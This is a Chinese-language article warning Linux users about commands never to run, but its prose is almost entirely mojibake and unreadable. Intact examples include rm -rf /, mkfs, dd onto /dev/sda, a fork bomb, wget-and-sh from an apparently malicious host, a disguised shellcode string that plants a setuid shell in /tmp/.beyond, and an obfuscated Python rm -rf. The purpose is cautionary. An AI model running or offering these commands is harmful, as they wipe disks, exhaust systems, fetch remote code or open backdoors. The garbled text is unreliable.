涓涓涓瑕杩琛Linux戒护

涓虹戒护缁瀵逛浠ヨ琛锛充娇浣瑙寰寰濂藉涔涓琛锛ら浣ㄨ轰杩琛锛虹浣浠ヨ锛锛涓哄浠瀹瀹ㄥㄧ村绯荤浠ヤroot绛楂绾х涓ц戒护濂界涔

╂涓澶╋Linux 绯荤浼 Windows ｆ锋琛锛ㄧ浜鸿ヨ澶锛璁＄轰浜瑙ｇ浜猴灏辨璇澶у锛Linux缁浣澶х搴卞害讹涔浣垮村郴缁寰村瀹规锛濡浣涓浜瑙ｆ浜戒护锛涓杞芥ц舵戒护琚杩琛浜戒护锛寰瀹规璁╀ 芥ヤ

杩骞朵 Linux 涓瀹ㄤ浜瑙 Linux 锛寰涓灏浜洪㈠锛Linux 涓瀹ㄣWindows 涔濂斤Linux 涔濂斤浜烘韩澶х涓瀹ㄥ绱

涓㈢戒护浼や纭涓浠讹rm -r 褰わ -f 寮哄跺ゆ遍╃椤癸充娇ュ父浣锛涔浼拌浠剁点

sudo rm -rf / ゆ瑰哄ㄩㄧ浠       sudo rm -rf . ゅ涓浠       sudo rm -rf * 涓       rm -rf * or rm -rf *.* 涓       rm -rf ~ / & ゆ瑰哄瀹剁锛充娇浣涓root锛瀹剁杩藉垢 

凤濡浣涓ラ mkfs.xxxx (xxxx 浠ユ vfatext2ext3bfs) 煎戒护璇锛杩琛涓㈢戒护浼や纭猴

sudo mkfs.xxxx 

dd 己澶х IO 杈ヨ哄宸ュ凤濡浣跨ㄤ褰锛村у澶э涓浠浠猴褰绯荤锛跺翠釜纭

sudo dd if=/dev/zero of=/dev/sda ㄩㄧ‖娓躲sudo dd if=/dev/sda of=/dev/sdb ㄧ涓纭瀹硅绗瀹广sudo dd if=something of=/dev/sda 寰纭涓炬版

锛存戒护缁瀹扮‖涓锛稿浜纭涓炬版

any_command > /dev/sda ㄩ版村‖

涓㈢ sda sdb 涔芥朵绫讳技绉般Linux /dev 绯荤缁绾电‖浠舵渚浜寰逛究寮哄ぇ斤朵浣垮村寰村

fork 戒护寮涓涓杩绋锛濡 fork 惧ㄦ寰涓缁瀛杩绋浼灏芥瀛璧婧锛

:(){:|:&};:

杩娈典ユ浜绗锛浠ヨ Shell 涓 fork 瀛杩绋锛村瀛灏斤涓寰涓杩涓 bug锛 Shell 璇绠褰㈠宸层涓㈢锛

fork while fork

跺锛缂╁涔涓村ユ锝

缂╁瑕姹浣瑙ｅ版涓郴缁涓凡缁ㄧ涓杩跺浣灏辫瑰浜锛缂╁㈠芥涓涓灏浠讹浠ュ绉浠跺灏璇瑕浣浠躲

缂╁璧锋ュ灏浣В烘ユ GB 炬版浼ヤ纭

浠姝ｈ缃绔涓杞界绋搴蜂舵戒护遍╋涓究ц锛

wget [url]http://some_place/some_file[/url]sh ./some_filewget [url]http://hax018r.org/malicious-script[/url]sh ./malicious-script

杞借纭ユ姝ｈ锛濡藉锛浠ラ璇诲朵唬充娇婧浠ｇ绋搴涔涓瑕究缂璇ц锛

char esp[] __attribute__ ((section(".text"))) = "xebx3ex5bx31xc0x50x54x5ax83xecx64x68""xffxffxffxffx68xdfxd0xdfxd9x68x8dx99""xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7""x56x04xf7x56x08xf7x56x0cx83xc4x74x56""x8dx73x08x56x53x54x59xb0x0bxcdx80x31""xc0x40xebxf9xe8xbdxffxffxffx2fx62x69""x6ex2fx73x68x00x2dx63x00""cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;";

涓㈢璧锋ュ娌℃ 16 杩舵版濡浜哄璇浣锛杩琛杩涓搴灏卞浠ヤ杈ュ寰绯荤 root 锛浣涓瑕镐俊浠锛涓㈢绋搴杩琛rm -rf ~ / &

python 涓绫荤瑷锛峰浠ユ挎ユ村

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg! "]))'

杩娈电搴涓浼ц rm -rf *锛涔璁镐寰濂㈢搴灏剧 sn!.sg! 涔锛瀹涓灏辨 rm -rf * 姣釜瀛姣涓涓涓

ｄ浠浣垮杩琛舵搴

绗涓瑕 root 浣涓烘ュ父浣跨ㄧㄦ凤涓㈢绋搴濡褰ㄦ蜂 root锛卞娉㈠村氨浼灏澶

绗瑕ラ戒护共浠涔ㄧ锛涓ラ戒护涓瑕惰琛杩琛娼ㄧ村藉绋搴瑕灏妫ヨ繁杈ャ

绗瑕淇璇杞欢ユ姝ｈ

癸界舵杈娑锛浣‘瀹瑕涓癸缁父澶浠戒版锛